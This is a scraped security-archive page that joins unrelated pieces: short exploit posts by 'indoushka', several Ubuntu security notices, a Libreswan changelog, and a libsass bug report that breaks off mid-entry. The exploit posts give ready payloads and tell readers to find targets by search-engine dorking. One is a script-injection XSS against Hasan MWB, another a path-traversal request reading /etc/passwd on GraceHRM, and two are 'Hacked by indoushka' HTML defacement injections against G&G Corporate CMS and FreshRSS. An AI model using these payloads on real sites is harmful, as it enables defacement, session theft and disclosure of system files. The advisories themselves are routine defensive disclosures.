Hasan MWB version 1 suffers from a cross site scripting vulnerability.

**Hasan MWB 1 Cross Site Scripting**

Posted Aug 28, 2023

Authored by indoushka

Hasan MWB version 1 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 4a53646feef7ce0d66491bbe2483dcbe70097fdb2aef17667fd6e5a2c356c92e

Download | Favorite | View

**Hasan MWB 1 Cross Site Scripting**

    ====================================================================================================================================| # Title     : Hasan MWB v1 - XSS Vulnerability                                                                                   || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               || # Vendor    : http://sourceforge.net/                                                                                            |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /?q=1</title><ScRiPt >prompt(/indoushka/)</ScRiPt>[+] go to http://127.0.0.1/hasanmwbsourceforgenet/?q=1%3C/title%3E%3CScRiPt%20%3Eprompt(/indoushka/)%3C/ScRiPt%3E Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (82,016)
*   Arbitrary (16,216)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,282)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,348)
*   DoS (23,456)
*   Encryption (2,370)
*   Exploit (51,984)
*   File Inclusion (4,224)
*   File Upload (976)
*   Firewall (821)
*   Info Disclosure (2,786)
*   Intrusion Detection (892)
*   Java (3,045)
*   JavaScript (859)
*   Kernel (6,681)
*   Local (14,456)
*   Magazine (586)
*   Overflow (12,693)
*   Perl (1,423)
*   PHP (5,149)
*   Proof of Concept (2,338)
*   Protocol (3,603)
*   Python (1,535)
*   Remote (30,811)
*   Root (3,587)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,640)
*   Security Tool (7,889)
*   Shell (3,187)
*   Shellcode (1,215)
*   Sniffer (895)
*   Spoof (2,207)
*   SQL Injection (16,392)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (665)
*   Vulnerability (31,788)
*   Web (9,670)
*   Whitepaper (3,750)
*   x86 (962)
*   XSS (17,967)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,822)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,514)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,754)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,838)
*   UNIX (9,293)
*   UnixWare (186)
*   Windows (6,575)
*   Other

Hasan MWB 1 Cross Site Scripting

An issue was discovered in Libreswan 3.x and 4.x before 4.12. When an IKEv1 ISAKMP SA Informational Exchange packet contains a Delete/Notify payload followed by further Notifies that act on the ISAKMP SA, such as a duplicated Delete/Notify message, a NULL pointer dereference on the deleted state causes the pluto daemon to crash and restart.

*   Aug 8, 2023
*   273ab05
*   zip
*   tar.gz
*   Notes

*   May 3, 2023
*   cbfa405
*   zip
*   tar.gz
*   Notes

*   Mar 1, 2023
*   b681175
*   zip
*   tar.gz

v4.9 (October 13, 2022)

\* IKEv1: fix crasher (introduced in 4.8) when USE\_NSS\_KDF=false or MD5 \[Andrew\]
\* IKEv2: fix RFC 8229 IKE/ESP over IPv6 TCP \[Andrew\]

*   Oct 14, 2022
*   394c823
*   zip
*   tar.gz

v4.8 (October 2, 2022)

\* release: remove SHA1 bindings from LIBRESWAN OpenPGP key \[dkg/Paul\]
\* pluto: ignore obsoleted unused interfaces= / --iface \[Paul/Andrew\]
\* pluto: various internal crypto struct changes \[Andrew\]
\* pluto: fix traffic counters for AH and IPCOMP \[Andrew\]
\* pluto: improve logging of duplicate serial cert error \[Andrew\]
\* pluto: support for maxbytes/maxpacket counters \[Antony/Paul\]
\* pluto: handle HW tokens using strange CKAIDs; github/815 \[Andrew\]
\* pluto: added --ipsec-max-bytes / --ipsec-max-packets support \[Antony\]
\* libipsecconf: added ipsec-max-bytes= and ipsec-max-packets= options \[Paul\]
\* IKEv2: emit one CERTREQ payload with all the hashes \[Andrew\]
\* addconn/whack: add support for {left,right}pubkey= \[Andrew\]
\* showhostkey: add support for ECDSA pubkeys \[Andrew\]
\* Crypto: add KDF self tests \[Daiki Ueno\]
\* IPv6: open IPv6 IKE port 4500; github/800 \[Andrew\]
\* showhostkey: add --pem option to print PEM encoded public key \[Andrew\]
\* unbound: \_unbound-hook converted from python to shell \[Andrew\]
\* BSD: delete old BSDKAME code replaced by PFKEYV2 code \[Andrew\]
\* BSD: fix replay window byte vs bit math \[Andrew\]
\* BSD: fix code finding interfaces; github/728 \[Andrew\]
\* FreeBSD: support large replay window; github/756 \[Andrew\]
\* FreeBSD: support ESN; github/721 \[Andrew\]
\* linux: update copy of xfrm.h header \[Paul\]
\* packaging: update fedora spec file \[Paul/Tuomo\]
\* building: on BSD, always use GCC; freebsd/264288 llvm/55963 \[Andrew\]
\* building: enable LTO when USE\_LTO=true; github/836 github/834 \[Andrew\]
\* building: dropped default build and packaging support for:
  	    Fedora 22, 28, 29, 30
            Debian stretch
            Ubuntu cosmic, xenial
            RHEL6 was removed in v4.5
            Add SUSE, Arch, Mint

*   Oct 3, 2022
*   be225bf
*   zip
*   tar.gz

v4.7 (May 24, 2022)

\* IKEv2: EAPTLS support \[Timo Teräs / Andrew\]
\* IKEv2: EAPONLY support \[Andrew\]
\* IKEv2: fix interop when IPCOMP+transport-mode \[Andrew\]
\* IKEv2: fix race between new IKE SA and liveness \[Andrew\]
\* IKEv2: fix interop with Android 12 + certificates \[Andrew\]
\* IKEv1: reject IKEv2 only authby=secret+rsasig \[Andrew\]
\* config: end keywords with no left/right prefix are applied to both ends
\* kernel: fix double delete of kernel policy when tearing down SA \[Andrew\]
\* kernel: fix deleting policy when an XFRMi FD ID; github/618 \[Andrew\]
\* kernel: general cleanups \[Andrew\]
\* \_stackmanager / pluto: support Ubuntu 18.04 LTS kernels \[Paul\]
\* FreeBSD: libreswan builds out-of-the-box \[Andrew\]
\* BSD: Add IPv6 support (tested on NetBSD)
\* building: fix build on fedora rawhide \[Paul\]
\* internals: initiate IKEv2 CREATE\_CHILD\_SA exchange using IKE SA \[Andrew\]
\* internals: \_updown.bsdkame renamed to \_updown.bsd

*   May 24, 2022
*   19eabcd
*   zip
*   tar.gz

v4.6 (January 11, 2022)

\* SECURITY: Fixes CVE-2022-23094 https://libreswan.org/security/CVE-2022-23094
\* IKEv2: aggressively check incoming fragments \[Andrew\]
\* IKEv2: when rekeying and PFS, only propose/allow original crypt-suite \[Andrew\]
\* IKEv2: when PFS, don't repeatedly log all proposals \[Andrew\]
\* IKEv2: Labeled IPsec improvements \[Andrew\]
\* IKEv1: support for ISAKMP\_N\_CISCO\_LOAD\_BALANCE removed \[Andrew\]
\* pluto: Revamp the host connection lookup mechanism \[Andrew\]
\* pluto: Change default replay-window from 32 to 128 \[Paul\]
\* pluto: Change default esn= to "either" and prefer "yes" \[Paul\]
\* pluto: Disable esn when replay-window=0 \[Paul\]
\* pluto: Drop obsolete debug options such as crypto-low \[Andrew\]
\* seccomp: Updated syscall allow-list \[Paul\]
\* packaging: replace old SUSE packaging with pointer to downstream \[Andrew\]
\* NetBSD: Don't use ESN - not supported by kernel \[Andrew\]
\* letsencrypt: Fix bashisms in letsencrypt script \[dkg\]
\* libipsecconf: allow leftauth=ecdsa|rsa (match authby= values) \[Paul\]
\* testing: significantly improved testing \[Andrew, Paul\]

*   Jan 12, 2022
*   5cb4ea7
*   zip
*   tar.gz

v4.5 (August 20, 2021)

\* IKEv1: multiple subnets could lead to crossed wires, failures \[Paul/Andrew\]
\* IKEv2: don't tear down IKE SA on TS\_UNACCEPTABLE \[Paul\]
\* IKEv2: unpend/delete Child SA when rejected by IKE\_AUTH response \[Andrew\]
\* IKEv2: mobike: resolve\_defaultroute\_one() updates \[Andrew\]
\* IKEv2: mobike: prevent sending duplicate mobike response \[Andrew\]
\* IKEv2: Support for Childless IKE SA \[Andrew\]
\* IKEv2: redirect: make peer redirecting in IKE\_AUTH childless \[Vukasin\]
\* IKEv2: Labeled IPsec --up causes Childless IKE SA \[Andrew/Paul\]
\* IKEv2: Labeled IPsec conns share SPD policies (as IKEv1) \[Andrew/Paul/Kavinda\]
\* IKEv2: Performance; eliminate more O(#CONNECTIONS) code \[Andrew\]
\* IKEv2: Immediately delete replaced Child from new (IC) IKE SA \[Andrew/Paul\]
\* pluto: mismatched subnets= could take down all conns \[Paul\]
\* pluto: Don't delete existing IKE SA of connection instance \[Paul\]
\* pluto: fail better on parse errors in subnet= clause \[Paul\]
\* libswan: use getaddrinfo(3) instead of gethostbyname2(3) \[Hugh\]
\* libipsecconf: fail to load conn if no right= or left= set \[Paul\]
\* libipsecconf: change default of initial-contact= to yes \[Paul\]
\* X509: directly append new CRL requests to the fetch queue \[Andrew\]
\* whack: implement --impair trigger:<global-event> \[Andrew\]
\* ipsec.service: remove reload which did not work as expected \[Tuomo\]
\* portexcludes: update to use python3 \[Kim\]
\* building: fix NetBSD build \[Andrew\]
\* building: fix arm / aarch64 build \[kekePower@github\]
\* building: Remove support for RHEL6 USE\_OLD\_SELINUX \[Paul\]
\* packaging: handle properly rpm sysctl config \[Tuomo\]
\* packaging: rhel7: fix python2 shebang \[Tuomo\]

*   Aug 20, 2021
*   f36ab1b
*   zip
*   tar.gz

v4.4 (April 22, 2021)

\* IKEv2: Fixes for TCP encap in Transport Mode and host-to-host \[Paul/Sabrina\]
\* IKEv2: Fixes to Labeled IPsec policies \[Kavinda Wewegama/Paul\]
\* IKEv2: Add redirect statistics to whack --globalstatus \[Clive Zagno\]
\* IKEv2: Connections would not always switch when needed \[Andrew/Paul\]
\* pluto: Fix for host-to-host connections use non-standard IKE ports \[Paul\]
\* pluto: Use peer ID (IKEv2 IDr, IKEv1 Aggr) to select best initial conn \[Paul\]
\* pluto: Disable interface-ip= as the feature is not yet implemented \[Paul\]
\* pluto: Fix PLUTO\_PEER\_CLIENT\* in updown for NAT + Transport Mode \[Paul\]
\* pluto: Remove never updated PLUTO\_VERSION for updown scripts \[Paul\]
\* pluto: Actually set PLUTO\_CONNECTION\_TYPE= to transport or tunnel \[Paul\]
\* pluto: Allow non-templated wildcard ID connections to match \[Paul\]
\* pluto: Reduce and merge various logging messages \[Andrew\]
\* libipsecconf: Do not allow vhost/vnet in IKEv2 connections \[Paul\]
\* XFRM: Restarting pluto when using ipsec-interface= could fail \[Paul\]
\* contrib/munin: Update plugin to use python3 and update doc header \[Tuomo\]
\* testing: Enable OpenBSD interop tests \[Paul/Ravi\]
\* testing: Make tests more reliable on KVM \[Andrew\]

*   Apr 22, 2021
*   383a28e
*   zip
*   tar.gz

v4.3 (February 21, 2021)

\* pluto: Restore range checking on Labeled IPsec \[Paul/Andrew\]
\* pluto: Higher state serialno does not imply newest state \[Paul\]
\* pluto: Cleanup ip\_address vs ip\_endpoint (protoport dropping) \[Andrew\]
\* pluto: Revival of code could accidentally fallback to IKEv1 \[Andrew\]
\* newhostkey: Add support for generating ECDSA keys \[Daiki Ueno\]
\* libipsecconf: Ignore empty option at end of config (rhbz#1685653) \[Andrew\]
\* whack: Add --global-redirect and --global-redirect-to options \[Pietro Monteiro\]

*   Feb 21, 2021
*   8a6ccf7
*   zip
*   tar.gz

CVE-2023-38712: Tags · libreswan/libreswan

Ubuntu Security Notice 6307-1 - It was discovered that JOSE for C/C++ AES GCM decryption routine incorrectly uses the Tag length from the actual Authentication Tag provided in the JWE. An attacker could use this to cause a denial of service or might expose sensitive information.

=========================================================================  
Ubuntu Security Notice USN-6307-1  
August 24, 2023

cjose vulnerability  
=========================================================================  
A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)

Summary:

JOSE for C/C++ could be made to crash if it received specially crafted input.

Software Description:  
- cjose: C library implementing the JOSE standard (development files)

Details:

It was discovered that JOSE for C/C++ AES GCM decryption routine incorrectly  
uses the Tag length from the actual Authentication Tag provided in the JWE.  
An attacker could use this to cause a denial of service (system crash) or  
might expose sensitive information.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
  libcjose0                       0.6.2.1-1ubuntu0.1

Ubuntu 22.04 LTS:  
  libcjose0                       0.6.1+dfsg1-3ubuntu1.1

Ubuntu 20.04 LTS:  
  libcjose0                       0.6.1+dfsg1-1ubuntu0.1

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
  libcjose0                       0.6.0+dfsg1-1ubuntu0.1~esm1

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6307-1  
  CVE-2023-37464

Package Information:  
  https://launchpad.net/ubuntu/+source/cjose/0.6.2.1-1ubuntu0.1  
  https://launchpad.net/ubuntu/+source/cjose/0.6.1+dfsg1-3ubuntu1.1  
  https://launchpad.net/ubuntu/+source/cjose/0.6.1+dfsg1-1ubuntu0.1

Ubuntu Security Notice USN-6307-1

Ubuntu Security Notice 6306-1 - It was discovered that Fast DDS incorrectly handled certain inputs. A remote attacker could possibly use this issue to cause a denial of service and information exposure. This issue only affected Ubuntu 22.04 LTS. It was discovered that Fast DDS incorrectly handled certain inputs. An attacker could possibly use this issue to cause a crash.

    ==========================================================================Ubuntu Security Notice USN-6306-1August 24, 2023fastdds vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 23.04- Ubuntu 22.04 LTS (Available with Ubuntu Pro)Summary:Fast DDS could be made to crash or expose sensitive information if itreceived specially crafted input.Software Description:- fastdds: eProsima FastDDS Discovery Server and ToolsDetails:It was discovered that Fast DDS incorrectly handled certain inputs.A remote attacker could possibly use this issue to cause a denial ofservice and information exposure. This issue only affected Ubuntu22.04 LTS. (CVE-2021-38425)It was discovered that Fast DDS incorrectly handled certain inputs.An attacker could possibly use this issue to cause a crash.(CVE-2023-39534, CVE-2023-39945, CVE-2023-39946, CVE-2023-39947,CVE-2023-39948, CVE-2023-39949)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 23.04:   fastdds-tools                   2.9.1+ds-1ubuntu0.1   libfastrtps2.9                  2.9.1+ds-1ubuntu0.1Ubuntu 22.04 LTS (Available with Ubuntu Pro):   fastdds-tools                   2.5.0+ds-3ubuntu0.1~esm1   libfastrtps2.5                  2.5.0+ds-3ubuntu0.1~esm1In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6306-1   CVE-2021-38425, CVE-2023-39534, CVE-2023-39945, CVE-2023-39946,   CVE-2023-39947, CVE-2023-39948, CVE-2023-39949Package Information:   https://launchpad.net/ubuntu/+source/fastdds/2.9.1+ds-1ubuntu0.1

Ubuntu Security Notice USN-6306-1

Ubuntu Security Notice 6305-1 - It was discovered that PHP incorrectly handled certain XML files. An attacker could possibly use this issue to expose sensitive information. It was discovered that PHP incorrectly handled certain PHAR files. An attacker could possibly use this issue to cause a crash, expose sensitive information or execute arbitrary code.

=========================================================================  
Ubuntu Security Notice USN-6305-1  
August 23, 2023

php8.1 vulnerabilities  
=========================================================================  
A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.04 LTS

Summary:

Several security issues were fixed in PHP.

Software Description:  
- php8.1: HTML-embedded scripting language interpreter

Details:

It was discovered that PHP incorrectly handled certain XML files.  
An attacker could possibly use this issue to expose sensitive information.  
(CVE-2023-3823)

It was discovered that PHP incorrectly handled certain PHAR files.  
An attacker could possibly use this issue to cause a crash,  
expose sensitive information or execute arbitrary code.  
(CVE-2023-3824)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
  libapache2-mod-php8.1           8.1.12-1ubuntu4.3  
  php8.1                          8.1.12-1ubuntu4.3  
  php8.1-cgi                      8.1.12-1ubuntu4.3  
  php8.1-cli                      8.1.12-1ubuntu4.3  
  php8.1-fpm                      8.1.12-1ubuntu4.3  
  php8.1-xml                      8.1.12-1ubuntu4.3

Ubuntu 22.04 LTS:  
  libapache2-mod-php8.1           8.1.2-1ubuntu2.14  
  php8.1                          8.1.2-1ubuntu2.14  
  php8.1-cgi                      8.1.2-1ubuntu2.14  
  php8.1-cli                      8.1.2-1ubuntu2.14  
  php8.1-fpm                      8.1.2-1ubuntu2.14  
  php8.1-xml                      8.1.2-1ubuntu2.14

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6305-1  
  CVE-2023-3823, CVE-2023-3824

Package Information:  
  https://launchpad.net/ubuntu/+source/php8.1/8.1.12-1ubuntu4.3  
  https://launchpad.net/ubuntu/+source/php8.1/8.1.2-1ubuntu2.14

Ubuntu Security Notice USN-6305-1

GraceHRM version 1.0.3 suffers from a directory traversal vulnerability.

**GraceHRM 1.0.3 Directory Traversal**

Posted Aug 24, 2023

Authored by indoushka

GraceHRM version 1.0.3 suffers from a directory traversal vulnerability.

tags | exploit, file inclusion

SHA-256 | 1ef7aca42ba692fa60907a0530d21ee9db579bba9acd7d508271bcf4d6e8171a

Download | Favorite | View

**GraceHRM 1.0.3 Directory Traversal**

    ====================================================================================================================================| # Title     : GraceHRM v1.0.3 Directory traversal Vulnerability                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)                                               | | # Vendor    : http://p30vel.ir/                                                                                                  |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /admin/download?type=files&filename=../../../../../../../../../etc/passwd[+] http://127.0.0.1/hrmgraceitltdcom/admin/download?type=files&filename=../../../../../../../../../etc/passwdGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (82,010)
*   Arbitrary (16,214)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,282)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,348)
*   DoS (23,453)
*   Encryption (2,370)
*   Exploit (51,962)
*   File Inclusion (4,223)
*   File Upload (976)
*   Firewall (821)
*   Info Disclosure (2,785)
*   Intrusion Detection (892)
*   Java (3,045)
*   JavaScript (859)
*   Kernel (6,681)
*   Local (14,456)
*   Magazine (586)
*   Overflow (12,693)
*   Perl (1,423)
*   PHP (5,149)
*   Proof of Concept (2,338)
*   Protocol (3,603)
*   Python (1,535)
*   Remote (30,803)
*   Root (3,587)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,640)
*   Security Tool (7,889)
*   Shell (3,187)
*   Shellcode (1,215)
*   Sniffer (895)
*   Spoof (2,207)
*   SQL Injection (16,385)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (665)
*   Vulnerability (31,788)
*   Web (9,670)
*   Whitepaper (3,750)
*   x86 (962)
*   XSS (17,956)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,819)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,508)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,753)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,836)
*   UNIX (9,292)
*   UnixWare (186)
*   Windows (6,575)
*   Other

GraceHRM 1.0.3 Directory Traversal

Ubuntu Security Notice 6304-1 - It was discovered that telnetd in GNU Inetutils incorrectly handled certain inputs. An attacker could possibly use this issue to cause a crash. This issue only affected Ubuntu 20.04 LTS and Ubuntu 22.04 LTS It was discovered that Inetutils incorrectly handled certain inputs. An attacker could possibly use this issue to expose sensitive information, or execute arbitrary code.

=========================================================================  
Ubuntu Security Notice USN-6304-1  
August 22, 2023

inetutils vulnerabilities  
=========================================================================  
A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Inetutils could be made to crash or execute arbitrary code.

Software Description:  
- inetutils: File Transfer Protocol client

Details:

It was discovered that telnetd in GNU Inetutils incorrectly handled certain inputs.  
An attacker could possibly use this issue to cause a crash.  This issue  
only affected Ubuntu 20.04 LTS and Ubuntu 22.04 LTS (CVE-2022-39028)

It was discovered that Inetutils incorrectly handled certain inputs.  
An attacker could possibly use this issue to expose sensitive information,  
or execute arbitrary code.  
(CVE-2023-40303)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
  inetutils-telnetd               2:2.4-2ubuntu1.1  
  inetutils-tools                 2:2.4-2ubuntu1.1

Ubuntu 22.04 LTS:  
  inetutils-telnetd               2:2.2-2ubuntu0.1  
  inetutils-tools                 2:2.2-2ubuntu0.1

Ubuntu 20.04 LTS:  
  inetutils-telnetd               2:1.9.4-11ubuntu0.2  
  inetutils-tools                 2:1.9.4-11ubuntu0.2

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6304-1  
  CVE-2022-39028, CVE-2023-40303

Package Information:  
  https://launchpad.net/ubuntu/+source/inetutils/2:2.4-2ubuntu1.1  
  https://launchpad.net/ubuntu/+source/inetutils/2:2.2-2ubuntu0.1  
  https://launchpad.net/ubuntu/+source/inetutils/2:1.9.4-11ubuntu0.2

Ubuntu Security Notice USN-6304-1

G and G Corporate CMS version 1.0 suffers from a cross site scripting vulnerability.

**G And G Corporate CMS 1.0 Cross Site Scripting**

Posted Aug 23, 2023

Authored by indoushka

G and G Corporate CMS version 1.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | ec7e6459653c2e6f1683c120c47e58e61d870a911a466497ef2ef99455a30669

Download | Favorite | View

**G And G Corporate CMS 1.0 Cross Site Scripting**

    ====================================================================================================================================| # Title     : G&G Corporate CMS v1.0  XSS Vulnerability                                                                          || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit)                                             | | # Vendor    : http://gegweb.it                                                                                                   |  | # Dork      : intext:Powered by Studio G&G Corporate Communication site:it                                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /prodotti.php?LANG=2&id=prodotti&CAT=1'<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+] http://priolinoxit/prodotti.php?LANG=2&id=prodotti&CAT=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3EGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (82,006)
*   Arbitrary (16,212)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,282)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,347)
*   DoS (23,453)
*   Encryption (2,370)
*   Exploit (51,952)
*   File Inclusion (4,222)
*   File Upload (976)
*   Firewall (821)
*   Info Disclosure (2,785)
*   Intrusion Detection (892)
*   Java (3,045)
*   JavaScript (859)
*   Kernel (6,681)
*   Local (14,456)
*   Magazine (586)
*   Overflow (12,693)
*   Perl (1,423)
*   PHP (5,147)
*   Proof of Concept (2,338)
*   Protocol (3,602)
*   Python (1,535)
*   Remote (30,799)
*   Root (3,587)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,640)
*   Security Tool (7,888)
*   Shell (3,186)
*   Shellcode (1,215)
*   Sniffer (894)
*   Spoof (2,207)
*   SQL Injection (16,383)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (665)
*   Vulnerability (31,788)
*   Web (9,670)
*   Whitepaper (3,750)
*   x86 (962)
*   XSS (17,953)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,819)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,504)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,750)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,835)
*   UNIX (9,291)
*   UnixWare (186)
*   Windows (6,574)
*   Other

G And G Corporate CMS 1.0 Cross Site Scripting

FreshRSS version 1.11.1 suffers from an html injection vulnerability.

**FreshRSS 1.11.1 HTML Injection**

Posted Aug 23, 2023

Authored by indoushka

FreshRSS version 1.11.1 suffers from an html injection vulnerability.

tags | exploit

SHA-256 | c789b4001ff7c396e22af1e82b8f9c8c3a4f13f593828eb66d0a73226d79294b

Download | Favorite | View

**FreshRSS 1.11.1 HTML Injection**

    ====================================================================================================================================| # Title     : FreshRSS v1.11.1 Html Inject Vulnerability                                                                         || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://freshrss.org/                                                                                              |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use payload : <marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+]  https://demo127.0.0.1/freshrssorg/i/?c=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (82,006)
*   Arbitrary (16,212)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,282)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,347)
*   DoS (23,453)
*   Encryption (2,370)
*   Exploit (51,952)
*   File Inclusion (4,222)
*   File Upload (976)
*   Firewall (821)
*   Info Disclosure (2,785)
*   Intrusion Detection (892)
*   Java (3,045)
*   JavaScript (859)
*   Kernel (6,681)
*   Local (14,456)
*   Magazine (586)
*   Overflow (12,693)
*   Perl (1,423)
*   PHP (5,147)
*   Proof of Concept (2,338)
*   Protocol (3,602)
*   Python (1,535)
*   Remote (30,799)
*   Root (3,587)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,640)
*   Security Tool (7,888)
*   Shell (3,186)
*   Shellcode (1,215)
*   Sniffer (894)
*   Spoof (2,207)
*   SQL Injection (16,383)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (665)
*   Vulnerability (31,788)
*   Web (9,670)
*   Whitepaper (3,750)
*   x86 (962)
*   XSS (17,953)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,819)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,504)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,750)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,835)
*   UNIX (9,291)
*   UnixWare (186)
*   Windows (6,574)
*   Other

FreshRSS 1.11.1 HTML Injection

Stack overflow vulnerability in ast_selectors.cpp in function Sass::CompoundSelector::has_real_parent_ref in libsass:3.6.5-8-g210218, which can be exploited by attackers to causea denial of service (DoS). Also affects the command line driver for libsass, sassc 3.6.2.

****1\. Description****

A stack-overflow has occurred in Sass::CompoundSelector::has_real_parent_ref() of src/ast_selectors.cpp:557 when running program ./sassc/bin/sassc, this can reproduce on the lattest commit.

****2\. Software version info****

$ git log -1
commit 2102188d21d2b7577c2b3edb12832e90786a2831 (HEAD -\> master, origin/master, origin/HEAD)
Merge: 006bbf5c f0605a31
Author: Marcel Greter <doyouspam@ocbnet.ch\>
Date:   Fri Sep 9 20:41:03 2022 +0200

    Merge pull request #3176 from LilyWangLL/vcpkg-instructions
    
    Add vcpkg installation instructions

$ ./sassc/bin/sassc --version
sassc: 3.6.2
libsass: 3.6.5-8-g210218
sass2scss: 1.1.1
sass: 3.5

****3\. System version info****
